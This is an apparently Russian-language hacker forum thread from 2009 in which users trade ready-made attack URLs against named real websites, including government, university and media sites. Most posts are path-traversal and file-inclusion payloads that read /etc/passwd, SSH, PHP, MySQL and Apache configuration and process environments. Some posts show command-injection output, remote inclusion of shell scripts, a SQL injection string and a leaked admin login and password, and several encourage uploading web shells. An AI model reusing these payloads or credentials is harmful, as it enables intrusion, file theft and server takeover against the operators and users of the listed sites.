http://www.zeegersloot.nl/index.php?inc=open_basedir
http://www.mediahostnet.com/v2/index.php?inc=manual&p=open_basedir
http://www.outtatime.com.au/index.php?inc=open_basedir
http://stramberk.ecn.cz/index.php?inc=open_basedir
http://www.dieschwarzataler.at/album/index.php?inc=open_basedir
http://www.zonabern.ch/index.php?inc=open_basedir
http://www.stufenlos.ch/index.php?inc=open_basedir
http://kompaktservice.com/index.php?include=open_basedir

Read File | windows
http://classicandbasic.sytes.net/classic/index.php?inc=windows_inc
http://www.kyoto-eiyoiryo.ac.jp/kisotsu/index.php?inc=windows_inc
http://www.doh.gov.za/hmtp/index.php?include=windows_inc
http://www.cafda.org.za/index.php?include=windows_inc
http://www.fes.org.za/index.php?include=windows_inc
http://www.fawu.org.za/index.php?include=windows_inc
http://www.lionfunds.co.za/index.php?include=windows_inc

InFlame
09.03.2009, 20:25
Чёрным по черному
http://www.venturesnowboards.com/index_07.php?inc=../../../../../../../../../../../../../etc/passwd

Ctacok
12.03.2009, 21:37
http://www.artdesigner.ru/?f=web&p=Локальный инклюд (Стоят Chmod'ы :( )
http://www.artoi.ru/index.php?p=х.з. вроде инклюд

ph1l1ster
12.03.2009, 21:49
http://sportskenovosti.hr/index.php?cmd=../../../../etc/passwd%00
http://support.novusnow.ca/internet/index.php?cmd=../../../etc/passwd%00
http://www.rv-nrw.de/page.php?include=../../../../../../etc/passwd

AkyHa_MaTaTa
12.03.2009, 21:58
sql injection+php include - т.к. вывода нету то можно узать как php include.

http://www.swsys.ru/index.php?page=53+union+select+1,2,3,4,0x2e2e2f2e2 e2f2e2e2f2e2e2f626f6f742e696e69,6,7,8--+

faza02
15.03.2009, 12:43
http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00

[Dezzter]
17.03.2009, 17:45
http://www.amacanada.org/template.php?fileName=../../../../../../../../../../../../../../../../../etc/passwd
http://www.syntasoft.com/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.supreme-commander.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://4ertim.com/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://prospectinfo.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

Rubaka
17.03.2009, 22:11
http://www.nccs.biz/lebanonballetschool/display.php?page=display.php

тама редирект так чо открывать каким нить AccessDiver!
100 пост )))

[Dezzter]
17.03.2009, 22:57
http://www.autobahn24.net/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.liga24.org/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.rechtsberater-cccr.de/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
и немного клубнички:
http://www.wildhookups.com/hosted/index.php?wm_login=hornyguys&cf=&geo=&app=&sub=&site=man_hook_ups1&page=../../../../../../../../../../../../../../../../../etc/passwd

InFlame
18.03.2009, 18:19
http://www.broughton.nsw.edu.au/casc/template.php?include=../../../../../../../../../../../../../../etc/passwd&heading=Links

KIR@PRO
18.03.2009, 23:56
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/passwd

а тут phpinfo() : http://www.saminfo.ru/~dmitrypg/x/info.php

возможно просматривать директории т.к. используется fopen + потому что ось FreeBSD (Морок)

Как пример http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/

если кто сможет найти пароли от фтп киньте плиз в личку оч прошу)))

August12
20.03.2009, 04:36
PHPlist Bug

Post Command:

_SERVER[ConfigFile]=../../../../../../../../../../../etc/passwd

http://www.scythe-eu.com/newsletter/lists//admin/index.php
http://newsletter.mdg-unternehmensberatung.de/newsletter/lists//admin/index.php
http://www.rmaxinternational.com/newsletter/lists//admin/index.php
http://www.kulinaria-mehr.de/newsletter/lists//admin/index.php
http://www.oil-price.net:8000/newsletter/lists//admin/index.php
http://news.eu123.info/newsletter/lists//admin/index.php
http://unicornnight.com/Newsletter/lists//admin/index.php
http://www.london-executive.com/newsletter/lists//admin/index.php
http://www.ready2move.be/newsletter/lists//admin/index.php
http://www.tstratmann.de/newsletter/lists//admin/index.php
http://www.lightupxmas.com/newsletter/lists//admin/index.php
http://www.dirtragmag.com/newsletter/lists//admin/index.php
http://www.ehl.edu/newsletter/lists//admin/index.php
http://markdionsbartramstravels.com/newsletter/lists//admin/index.php
http://www.lumifilm.fi/newsletter/lists//admin/index.php
http://www.nvcaz.com/newsletter/lists//admin/index.php
http://www.nwa.cc/newsletter/lists//admin/index.php
http://www.euroindy.com/portal/newsletter/lists//admin/index.php
http://www.stone-flooring-tips.com/newsletter/lists//admin/index.php
http://www.tangleweed.org/mail/lists//admin/index.php
http://www.dirtysouthevents.com/mail/lists//admin/index.php
http://www.osdnashville.org/newsletter/lists//admin/index.php
http://oldtownaa.com/mail/lists//admin/index.php
http://odnavaiaescola.com/mail/lists//admin/index.php

InFlame
20.03.2009, 20:49
http://www.kozcollective.nl/site2/index.php?pagefile=../../../../../../../../../../../../etc/passwd%00
http://www.accessibility.nl/games/index.php?pagefile=../../../../../../../../../../../etc/passwd%00

Морок
21.03.2009, 16:07
http://iskatel.org/

http://iskatel.org/?p=4&id=../../admin.php%00

login:Minerale
pass:03051968

Админка: http://iskatel.org/admin.php

P.S. 2 KIR@PRO : Диры читаются не потому что fopen, а потому что ось FreeBSD

laedafess
21.03.2009, 21:04
http://www.cyclingnews.com/interviews.php?id=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

-Hormold-
27.03.2009, 01:55
http://www.md5search.de/index.php?action=info&language=../../../../../../../../../../../../../etc/passwd%00

HIVER
27.03.2009, 08:21
http://katenok.pozitiv.lv/miau.php?p=../../../../../etc/passwd

Kraneg
06.04.2009, 22:09
datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
странный сайт, по кэшу гугла когда то был корень,нынче пусто...

Вобщем посмотрел на заголовок, увидел уже после того как нашел... =) eLouai's Download Script ищем в гугле такие есть еще... к примеру:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php

geezer.code
06.04.2009, 23:28
datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
странный сайт, по кэшу гугла когда то был корень,нынче пусто...

Вобщем посмотрел на заголовок, увидел уже после того как нашел... =) eLouai's Download Script ищем в гугле такие есть еще... к примеру:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php
смотрим название темы :)
PHP-инъекты
а это - читалка файлов.

Rubaka
07.04.2009, 11:04
http://www.gnpbu.iip.net/index.php?file=../../../../../boot.ini

[underwater]
07.04.2009, 23:41
http://globaldiscountsclub.com/index.php?option=com_pro_desk&include_file=../../../../../etc/passwd

http://www.gardenlaw.co.uk/cgi-bin/view_ads.cgi?category=39&process=1&template=../../../../../etc/passwd

http://www.jedit.org/index.php?page=features/?page=../../../../../../../../../../../../../etc/passwd%00

http://www.emsc-csem.org/index.php?page=home&sub=gmap/?page=../../../../../../../../../../../../../etc/passwd%00

http://www.bastian-friedrich.de/yappa//index.php?album=../../../../../../../../../../../../../etc/passwd

http://medicalcraft.com//main/index.php?content=../../../../../../../../../../../../../etc/passwd

http://www.velocos.ch/guestbook_e/admin.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00

http://www.hotelambrosianamilano.com/index.php?page=/etc/passwd

http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../etc/passwd

http://www.worldwidepay.com/index.php?read=../../../../../../../../../../../../../../etc/passwd

http://www.thinprint.com/view.php?page=../../../../../etc/passwd%00

http://www.rbgarage.com/rbg/index.php?go=../../../../etc/passwd%00

http://www.eurekalert.org/kidsnews/page.php?page=../../../../../../../etc/passwd%00

+StArT+
09.04.2009, 08:10
www.unicaen.fr (http://www.unicaen.fr/)
Université de Caen Basse-Normandie
-----------------------------
http://www.google.com.ua/favicon.ico Page Rank: 7
http://www.alexa.com/favicon.ico Alexa Rank: 14.516
-----------------------------

POST http://www.unicaen.fr/mrsh/irefi/expos0.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: www.unicaen.fr
Content-type: application/x-www-form-urlencoded
Referer: http://www.google.com/

page=../../../../../etc/passwd['.str_repeat("/.",2021).']
-----------------------------

mailbrush
10.04.2009, 17:28
http://www.balearsculturaltour.es/admin/aplicacion.php?cod=../../../../boot.ini

pantur
11.04.2009, 02:56
http://www.peaceduke.su/?content=../../../../../etc/passwd

Сайт, конечно, убогий, инклуд локальный, да еще open_basedir мешает. Как я понял, можно шарить по
/var/www/virtual/peaceduke.su/. Дальше все закрыто, но в папку /tmp доступ есть.

satana8920
12.04.2009, 13:48
http://www.baikap.de/index2.php?include=../../../../../../../../../../../etc/passwd&id=2&language=EN
вот от меня :)
ЗЫ а искал вообще скул иньекции :)

$n@ke
14.04.2009, 12:31
http://lawreview.law.ucdavis.edu/home.php?page=http://admin.narod.ru/lucky.php?&group=issues
Windows+open_basedir+URL file-access is disabled

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://vw.ddns.uark.edu/index.php?page=phpBB/config
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.vru.gov.ua/index.php?%C3%A5,../../../../../../../../etc/passwd,2911200

Высший совет юстиции Украины! о как =)


================================================== ===
http://fantasyflash.ru/test/?n=../../../../../../etc/hosts
ТиЦ PR
425 6

URL file-access is disabled in the server configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://27pearls.com.ua/?ch=http://microsoft.com/billy.php?

Отель 27 жемчужин.
================================================== ===
Что то плять никто ничего не постит..а тема ведь самая простая))

PR 6
http://www.overseas.doe.go.th:8081/overseas/index.php?lang=en&show=empreport&agencies_id=ftp://rem.com/shell.php?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Вроде как Арбитражный суд москвы! =)
http://jure-arbitr.ru/?rub=ftp://

Snap
18.04.2009, 15:13
http://www.raskleim.ru/
http://www.raskleim.ru/?xid=title&sm=titles/../../../../../../../etc/passwd%00

Расклейка объявлений, листовок и афиш в Санкт-Петербурге.
Сайт фуфел конечно но уязвимость есть =)

ph1l1ster
20.04.2009, 15:55
servizioclienti.repubblica.it
PR 7

http://www.servizioclienti.repubblica.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00

aphp.fr
PR 7

http://www.aphp.fr/index.php?module=../../../../../../../../../../../../../etc/passwd%00

worldsteel.org
PR 6

http://www.worldsteel.org/index.php?action=../../../../../../../../../../../../../etc/passwd%00

www.reformtheun.org
PR 6

http://www.reformtheun.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00

filmmusic.net
PR 5

http://www.filmmusic.net/page.php?page=../../../../../../../../../../../../../etc/passwd%00

thewho.com
PR 5

http://www.thewho.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00

ph1l1ster
21.04.2009, 14:07
2kgames.com
pr6 | tic 400

http://www.2kgames.com/index.php?p=../../../../../../etc/passwd%00

utbookstore.tennessee.edu

http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00

stefanmay.com

http://www.stefanmay.com/index.php?p=../../../../../etc/passwd%00

Rubaka
22.04.2009, 22:41
http://www.myspace-layouts.us/pages.php?page=../index

BHYCHIK
23.04.2009, 01:33
http://www.vcdh.virginia.edu/index.php?page=../../../etc/passwd%00

S00pY
26.04.2009, 16:45
мде
http://ssw.uconn.edu/index.php?path=index.php%00

Gar|k
29.04.2009, 00:23
http://rastaman.tales.ru/?page=lol&menu1=1&menu2=2&smenu1=1&inctext=6

может и боян не знаю
но сказки там клевые ) еще попробуйте поиздеватся над переменными остальные тоже много интересного

winstrool
30.04.2009, 14:37
_http://www.logicnsk.ru/price/?file=../../../../../../etc/passwd&cat_id=654

udman
09.05.2009, 20:22
http://gps.ck.ua/index.php?id=../../

udman
10.05.2009, 00:58
можно еще вот здесь покопатся

http:// de n.zp.ua/index.php?page=../filename

Rubaka
11.05.2009, 21:54
http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00

bug1z
13.05.2009, 17:02
http://fanforum.org.ua/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://www.itnr.ru/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
http://wirfilms.com/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html

vasyan
15.05.2009, 13:14
http://www.hcs.harvard.edu/gradmus/abstract.php?name=../../../../../../../../../../../../../../../etc/passwd%00

или так

http://www.hcs.harvard.edu/gradmus/abstract.php?name=../abstract.php%00
:)

InFlame
15.05.2009, 19:40
http://www.mtcwork.com.au/innovation.php?file=../../../../../../../../../../etc/passwd
OS: FreeBSD

ILYAtirtir
18.05.2009, 02:37
U.S. Department of Housing and Urban Development
http://www.hud.gov/news/release.cfm?content=../../../../../../../../../../etc/passwd

$n@ke
19.05.2009, 12:05
ololo
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/apache2/httpd.conf

ta-kyn
23.05.2009, 05:38
Здесь для этого, наверное, самое место.

Master PFP (Printer Friendly Page) v1.7 - multi-file include
Off.site: www.willmaster.com (http://www.willmaster.com)
Google: 'inurl:MasterPFP.pl?doc='

Скидываю оптом =]

На Офф.сайте:
www.willmaster.com/software/pfp/MasterPFP.cgi?doc=../../../
.edu
www.rsp.wisc.edu/scripts/MasterPFP.pl?doc=../../../../../etc/passwd
Выполнение команд:
http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
http://www.german-philharmonic-bigband.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
И т.д:
www.vtol.org/cgi-bin/masterpfp.cgi?doc=../../../../etc/passwd
www.womensweb.ca/cgi-bin/MasterPFP.cgi?doc=../../../../etc/passwd
www.dianaskitchen.com/cgi-bin/MasterPFP.cgi?doc=../../../etc/passwd
www.faktuell.de/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
www.genuinecoaching.com/cgi/MasterPFP/MasterPFP.cgi?doc=../../../../../../../etc/passwd
www.delbert.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
www.circare.org/FOIA/MasterPFP.cgi?doc=../../../etc/passwd
www.eagleforum.org/cgi_bin/print/MasterPFP.cgi?doc=../../../../../../etc/passwd
www.varstrat.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd

The matrix
23.05.2009, 15:17
http://www.3sys.de/index/index.pl?url=download-index.de&seite=|id|

uid=30(wwwrun) gid=60001(visas) groups=60001(visas)

http://www.3sys.de/index/index.pl?url=download-index.de&seite=|which%20wget|

/usr/bin/wget


; ))))))

The matrix
24.05.2009, 00:02
1)
leinebeerfilms.nl
http://www.kleinebeerfilms.nl/cgi-bin/index.pl?page=../../../../../../../../../etc/passwd%00.txt
neilthompson.us
http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|id|

uid=465686 gid=888(vusers) groups=33(www-data)

http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|which%20wget|

/usr/bin/wget

удачи с заливкой шелла ; ))

vasyan
26.05.2009, 14:44
http://iah.ipm.illinois.edu/index.php?ch=../../etc/passwd

RulleR
29.05.2009, 10:59
[PR 4]
http://www.sitemad.com/index.php?p=popup&tpl=/etc/passwd
[PR 3]
http://www.doc-darmer-net.de/hpmaker/index.php?p=/etc/passwd
[PR 2]
http://www.gustatus.org/index.php?p=index.php

faza02
30.05.2009, 13:10
http://mzrd.ru/?f=../../../../../../../../../../../../../etc/passwd%00

ta-kyn
30.05.2009, 15:58
www.CBC.ca - Canadian News [PR 8]
www.cbc.ca/cgi-bin/quiz/quiz.cgi?quiz=../../../../../../../../etc/passwd%00

ProoF
02.06.2009, 18:10
catenabrasil.com

http://catenabrasil.com/portal/index.php?arq=[SHELL]

ProoF
02.06.2009, 22:26
WINNT

http://lib.mjes.tpc.edu.tw:9999/appserv/main.php?appserv_root=[shell]

ta-kyn
03.06.2009, 04:09
.edu.pl [PR 5]

http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../etc/passwd%00

mailbrush
03.06.2009, 15:03
http://www.beauteby.com/ru/gernetic/luxe.php?id=../../../../index

Велемир
04.06.2009, 01:29
http://www.orion.ua/modules/CATALOG/download.php?file=../../../../../../../../../../../../../../../../../etc/passwd%00%00

LFI

Много чего интересного,но к сайтам на VPS закрыт доступ (((.Толком-то я там не исследовал ничего...httpd.conf оежит по стандартному пути - /etc/httpd/conf/httpd.conf

В общем,если что надыбаете - пишите в PM/ЛС/icq )

И ещё: Если фаил или папка существует,то выдаст на скачку .pdf фаил.Переименовываете его в .doc(Так сразу форматирует,не то,что txt) или в .html.Если html,то открываете IE(имхо - лучший вариант).Если фаила нету,то просто белый экран.Также проверяются и каталоги.Если нету прав,то выдастся на скачку фаил в 1 KB.Там будет ошибка в file_get_contents() и сама ошибка - Permission Denied.Вот и всё.Спасибо всем:)

gluke
04.06.2009, 02:57
http://www.wines.at/forum/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00%00

nik3241
06.06.2009, 01:03
сайт по борьбе с торчками

http://nobf.ru/index.php/download.php?file=../../../../../../etc/passwd

RulleR
06.06.2009, 13:41
http://ezonet.ru/reports.php?page=../index.php
http://www.911pcar.com/index.php?page=../../../etc/passwd
http://aplus-computer.net/myspacegraphicshelper/onlinepss//index.php?page=../index.php

RulleR
08.06.2009, 15:45
[PR 4]
http://triod.kiev.ua/index.php?page=index.php
[PR 4]
http://www.chicagohungarians.com/index.php?page=/etc/passwd
[PR 3]
http://www.dbd.com.au/index.php?page=index.php
[PR 0]
http://legeartis-stom.com/index.php?page=/etc/passwd

BHYCHIK
08.06.2009, 21:57
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

Директория сайта: /usr/www/cyl.ru/www/

Gorev
15.06.2009, 11:20
http://www.lohuis.ro/index.php?page=../../../../../../../../../../etc/passwd%00

Pashkela
15.06.2009, 12:19
На баяны не проверял:

http://www.americascup.com/es/acmag/votre_interview/index.php?idContent=12688&idIndex=../../../../../../../../../../etc/passwd%00

http://www.clubedoexercito.com.br/index.php?arq=/home/httpd/vhosts/clubedoexercito.com.br/httpdocs/index

http://www.inoticia.com.br/index.php?arq=/home/httpd/vhosts/inoticia.com.br/httpdocs/config/config

http://www.aciub.com.br/index.php?arq=/var/www/dominios/www.aciub.com.br/site/index

http://www.coacyle.com/index.php?sec=D:%5CTrabajos%5Cwwwcoacyle%5Ccontrol %5Cincludes%5Cfunciones&id=81

mailbrush
15.06.2009, 19:47
http://www.dalcomstechnologies.com/products.php?id=[LFI]

[aywo]
16.06.2009, 12:26
PR 4
http://toyota.mnc.ru/?path=../../../etc/&file=passwd


PR 3
http://www.divetrade.ru/magazin/index.php?page=../../../../../../../../../../etc/passwd
(онлайн шоп на FreeBSD)

PR 3
http://www.autosport.com.ua/index.php?part=FAU&page=../../../../../../../../../../../etc/passwd

PR 3
http://www.alpha-sport.ru/index.php?page=index.php

PR 2
http://www.basegroup.su/index.php?Page=/../../../../../../../../../../../etc/passwd

mailbrush
16.06.2009, 18:46
http://www.ahoj-brause.de/produkte.php?id=3&sub=[LFI]

geforse
17.06.2009, 08:34
PR4
http://tunguska.sai.msu.ru/index.php?q=[LFI]

PR0
http://obti.com.ua/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

http://www.uspeh-b.ru/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]

Adm1n4eG
17.06.2009, 11:23
http://www.govor.ru/visit/tours/i mg.php?location=/etc/passwd

сохраняем и открываем...

geforse
17.06.2009, 15:36
PR2
http://catviz.sourceforge.net/index.php?userman_form=../../../../../../../../../../../../../etc/passwd

$n@ke
18.06.2009, 20:45
gaff
http://www.bfhd.wa.gov/news/news.php?newsflash=../../../../../../../../apache/conf/httpd.conf

Dj-Matrix
18.06.2009, 21:38
http://www.midland.edu/success/students.php?page=../../robots.txt

AlexSatter
19.06.2009, 09:26
http://inss.ru/index.php?id=index.php

geforse
20.06.2009, 22:59
http://www.imageup.ru/img12/rowdown2153787.png

PR3
http://www.galileo-tv.ru/inner.php?page=[LFI]

Можно через картинку залить shell

Pashkela
21.06.2009, 04:16
Немножко инъекций и читалок, включая слепые, скорее всего многого не было, т.к. пока не видел еще сканеров, когда ошибки не выводятся:


http://www.pudasjarvi.fi/deutsch/index.php?file=/etc/passwd
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/access_log
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/error_log
----------------------------
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/mysql/my.cnf
-----------------------------
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/my.cnf
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../usr/bin/grep

-----------------------------
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://www.bird.org.tw/index.php?block=../../../../etc/passwd
http://www.bird.org.tw/index.php?block=../../../../etc/ssh/sshd_config
-----------------------------
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/ssh/sshd_config
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/mysql/my.cnf
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/proftpd/modules.conf
-----------------------------
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/php.ini
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/my.cnf
-----------------------------
http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
http://www.tonie.net/index.php?p=../../../../../../../etc/ssh/sshd_config
http://www.tonie.net/index.php?p=../../../../../../../etc/apache2/httpd.conf
http://www.tonie.net/index.php?p=../../../../../../../etc/mysql/my.cnf
http://www.tonie.net/index.php?p=../../../../../../../etc/vsftpd.conf
------------------------------
-----------------------------
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/php/php.ini
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../usr/bin/grep
-----------------------------
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../proc/self/environ
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/ssh/sshd_config
-----------------------------
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/passwd
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../proc/self/environ
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/httpd/conf/httpd.conf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../usr/local/etc/php.ini
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/my.cnf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/logrotate.d/vsftpd.log
-----------------------------
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/access_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/error_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/conf/httpd.conf
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/etc/httpd/conf/httpd.conf
-------------------------------
http://www.toshin.com/cgi-bin/news/headline/view.cgi?File=|uname%20-a|
http://shimizu.dyndns.tv/simizu-t/cgi-bin/link.cgi?file=|uname%20-a|
http://f22.aaa.livedoor.jp/~gbwars/cgi-bin/gbw/turn/chdata.cgi?file=|uname%20-a|
http://www.nurs.or.jp/~siizuka/cgi-bin/download.cgi?file=|uname$IFS-a|
-----------------------------
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/passwd
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../proc/self/environ
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/apache2/httpd.conf
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/php5/apache2/php.ini
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../usr/bin/grep
-----------------------------
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/passwd
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../proc/self/environ
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/ssh/sshd_config
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/apache2/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/cgi/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/mysql/my.cnf
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/proftpd/modules.conf

Pashkela
21.06.2009, 13:49
-----------------------------
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/passwd
http://www.soccer7.org/show.pl?file=../../../../../../../../../proc/self/environ
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/access_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/error_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/php.ini
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/my.cnf
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/maillog
-----------------------------
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/passwd
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/ssh/sshd_config
http://www.acomputerguy.org/index.php?file=../../../../../../../../../var/log/httpd/access.log
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/etc/php.ini

AlexSatter
25.06.2009, 14:41
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
----

http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

---

http://valganoored.leadmaster.pri.ee/?id=index.php%00

---

http://radomiak.info/index.php?id=index.php%00

---

http://www.classic-appraisals.com/?id=index.php

Pashkela
26.06.2009, 15:18
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/passwd&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/ssh/sshd_config&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../usr/local/etc/php.ini&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/my.cnf&top=self&bottom=self
------------------------------
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/passwd&lang=german&source=index&title=Netboot-Spezifikation
